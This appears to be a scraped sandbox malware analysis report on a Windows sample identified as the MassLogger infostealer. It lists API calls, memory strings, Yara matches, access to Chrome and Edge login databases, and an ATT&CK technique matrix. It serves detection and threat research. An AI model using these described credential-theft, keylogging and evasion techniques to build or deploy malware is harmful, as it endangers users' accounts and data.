Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_004123F1 SetUnhandledExceptionFilter,	5_1_004123F1

Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager(k
Source: daphpvwO.pif, 00000005.00000002.3834660252.000000002CB6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ,Program Manager
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@zO
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4'
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028960000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerPr(k

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C54BC
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: GetLocaleInfoA,	0_2_029CA0B8
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: GetLocaleInfoA,	0_2_029CA104
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C55C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: GetLocaleInfoA,	5_2_00417A20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: GetLocaleInfoA,	5_1_00417A20

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ja811MqV4h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ja811MqV4h.exe

Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR

Source: C:\Users\user\Links\daphpvwO.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	4 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption